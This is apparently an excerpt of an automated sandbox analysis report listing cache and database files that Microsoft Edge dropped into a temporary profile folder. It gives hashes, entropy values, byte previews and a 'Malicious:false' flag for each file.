                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):24
                                                                                                                                      Entropy (8bit):2.1431558784658327
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:m+l:m
                                                                                                                                      MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                      SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                      SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                      SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:0\r..m..................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Code Cache\wasm\index-dir\temp-index

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):48
                                                                                                                                      Entropy (8bit):2.9972243200613975
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:ZI+4E19b:2U15
                                                                                                                                      MD5:DCD0811C5041D686CF27FAE2CCE56FD2
                                                                                                                                      SHA1:7B3FC0E5E8C591D179F0DAB6F03DCDC3989F568F
                                                                                                                                      SHA-256:488AC6D680F99880192FFC5A21739F5B32DBF5B8B86DECC78696785283A59D92
                                                                                                                                      SHA-512:61B7DD97A6B6620DF299660285FE0D0CAAFF4C7A40B67D8E3A9F0E3B22B267579AC29C8D64952759BF5D1692B671752E086E777F0AFBF5A5228ECC017C0C4BA5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:(....m.Goy retne.........................k..%./.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Code Cache\wasm\index-dir\the-real-index (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):48
                                                                                                                                      Entropy (8bit):2.9972243200613975
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:ZI+4E19b:2U15
                                                                                                                                      MD5:DCD0811C5041D686CF27FAE2CCE56FD2
                                                                                                                                      SHA1:7B3FC0E5E8C591D179F0DAB6F03DCDC3989F568F
                                                                                                                                      SHA-256:488AC6D680F99880192FFC5A21739F5B32DBF5B8B86DECC78696785283A59D92
                                                                                                                                      SHA-512:61B7DD97A6B6620DF299660285FE0D0CAAFF4C7A40B67D8E3A9F0E3B22B267579AC29C8D64952759BF5D1692B671752E086E777F0AFBF5A5228ECC017C0C4BA5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:(....m.Goy retne.........................k..%./.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\DawnCache\data_0

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8192
                                                                                                                                      Entropy (8bit):0.01057775872642915
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:MsFl:/F
                                                                                                                                      MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                      SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                      SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                      SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\DawnCache\data_1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):270336
                                                                                                                                      Entropy (8bit):8.280239615765425E-4
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                      MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                      SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                      SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                      SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\DawnCache\data_2

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8192
                                                                                                                                      Entropy (8bit):0.011852361981932763
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:MsHlDll:/H
                                                                                                                                      MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                      SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                      SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                      SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\DawnCache\data_3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8192
                                                                                                                                      Entropy (8bit):0.012340643231932763
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:MsGl3ll:/y
                                                                                                                                      MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                      SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                      SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                      SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\DawnCache\index

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):262512
                                                                                                                                      Entropy (8bit):9.553120663130604E-4
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:LsNlu5A4:Ls3u
                                                                                                                                      MD5:F916277B3776162B023098302419B326
                                                                                                                                      SHA1:A931D162E90A746339F86550C9ED0E6F0DC48AED
                                                                                                                                      SHA-256:C627C9F439D0D61E84E194CA34B79CFF4E14DAC1BE0DB43B154FED655F4C01A6
                                                                                                                                      SHA-512:6E54791349B5475BC2BA340CEA6FADC2943883D41FE0A367B753CD1A641632965D9FB5F169A5E5EF9C38474A5F8D50F964A5CAF5F294683E1F4365E7FB613A53
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:............................................%./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\EdgeCoupons\coupons_data.db\000001.dbtmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):33
                                                                                                                                      Entropy (8bit):3.5394429593752084
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                      MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                      SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                      SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                      SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...m.................DB_VERSION.1

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\EdgeCoupons\coupons_data.db\CURRENT (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):295
                                                                                                                                      Entropy (8bit):5.285483715501516
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:7PWShF+q1N723fQmmG2tbB2KLlpPWSzxq2PN723fQmmG2tMsIFUv:7xhF+aak9VFLTxzxvVak9GFUv
                                                                                                                                      MD5:74728D85E4CD87EB26AC24E7EBF68BEE
                                                                                                                                      SHA1:2CBE2F3EC45BF079BCED4AF53B17DCB419E9D602
                                                                                                                                      SHA-256:4A3DBFDA6A68DCF4038E5FABAC9D38879A60D035A3A1841738A23AE3A3AC8E2C
                                                                                                                                      SHA-512:8C4A735A3D9D60FB92B467EA1066FBF4EA9936EAA3B7CAE8A4BDA8E04B255F1F8F6B80613D0624FA3D69C9354D4B23B104D36CB45582239718DCE1E58F733999
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2024/12/18-13:28:23.242 17f0 Creating DB C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\EdgeCoupons/coupons_data.db since it was missing..2024/12/18-13:28:23.524 17f0 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):41
                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Extension Rules\000001.dbtmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Extension Rules\000003.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):171
                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
                                                                                                                                      MD5:E952942B492DB39A75DD2669B98EBE74
                                                                                                                                      SHA1:F6C4DEF325DCA0DFEC01759D7D8610837A370176
                                                                                                                                      SHA-256:14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
                                                                                                                                      SHA-512:9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Extension Rules\CURRENT (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Extension Rules\LOG

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):271
                                                                                                                                      Entropy (8bit):5.217701877552043
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:7PWSzhRM1N723fQm3aVdg2KLlpPWSVyq2PN723fQm3aPrqIFUv:7xDsabLTxYvVaE3FUv
                                                                                                                                      MD5:F80FB8590719D619D3498C2A57B86208
                                                                                                                                      SHA1:C55FDC78254FFE994CD9D6CEF0E97869744191C0
                                                                                                                                      SHA-256:4354BE36CD8556C8E559134411DB47894A61785438CD69E053DB0B532F5BB08F
                                                                                                                                      SHA-512:DC09D8E72C4BD5623DDF4776491697C4EE250670B7103B09FBC6D566BA2695B62E4F4CAD4074CAB66AD186A37488CB894FE3EA958EDBD4798098B0A2AADD1A79
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2024/12/18-13:28:23.219 17e4 Creating DB C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Extension Rules since it was missing..2024/12/18-13:28:23.498 17e4 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Extension Rules/MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Extension Rules\MANIFEST-000001

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):41
                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Extension Scripts\000001.dbtmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Extension Scripts\000003.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):171
                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
                                                                                                                                      MD5:E952942B492DB39A75DD2669B98EBE74
                                                                                                                                      SHA1:F6C4DEF325DCA0DFEC01759D7D8610837A370176
                                                                                                                                      SHA-256:14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
                                                                                                                                      SHA-512:9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Extension Scripts\CURRENT (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Extension Scripts\LOG

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):275
                                                                                                                                      Entropy (8bit):5.2029560677452285
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:7PWSt+RM1N723fQm36FB2KLlpPWSEgyq2PN723fQm365IFUv:7xtusaUFFLTxmvVaUWFUv
                                                                                                                                      MD5:38349167461667C196030ECE6401CEC9
                                                                                                                                      SHA1:35BF3F9BCE6E3217939A3F26F2D61B8FBC1C26F9
                                                                                                                                      SHA-256:D7BFD5DDDA180C238A01A5282AE7E3EA18D550E9654E1FE94D68AA94F0F05FFF
                                                                                                                                      SHA-512:931F68D606BE8A91BBDB581BC8B1372FD71E27750CDF6D901F35D82B837359E1BA36716907F72421FA0AD5D3E31A08D20A37F938822713362E0C229F9BCCB7FC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2024/12/18-13:28:23.647 17e4 Creating DB C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Extension Scripts since it was missing..2024/12/18-13:28:23.746 17e4 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Extension Scripts/MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Extension Scripts\MANIFEST-000001

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):41
                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Favicons

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 10, cookie 0x8, schema 4, UTF-8, version-valid-for 1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):20480
                                                                                                                                      Entropy (8bit):0.6975083372685086
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:LLiZxh0GY/l1rWR1PmCx9fZjsBX+T6UwcE85fBmI:EBmw6fU1zBmI
                                                                                                                                      MD5:F5BBD8449A9C3AB28AC2DE45E9059B01
                                                                                                                                      SHA1:C569D730853C33234AF2402E69C19E0C057EC165
                                                                                                                                      SHA-256:825FF36C4431084C76F3D22CE0C75FA321EA680D1F8548706B43E60FCF5B566E
                                                                                                                                      SHA-512:96ACDED5A51236630A64FAE91B8FA9FAB43E22E0C1BCB80C2DD8D4829E03FBFA75AA6438053599A42EC4BBCF805BF0B1E6DFF9069B2BA182AD0BB30F2542FD3F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\GPUCache\data_0

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8192
                                                                                                                                      Entropy (8bit):0.01057775872642915
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:MsFl:/F
                                                                                                                                      MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                      SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                      SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                      SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\GPUCache\data_1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):270336
                                                                                                                                      Entropy (8bit):8.280239615765425E-4
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                      MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                      SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                      SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                      SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                      Malicious:false
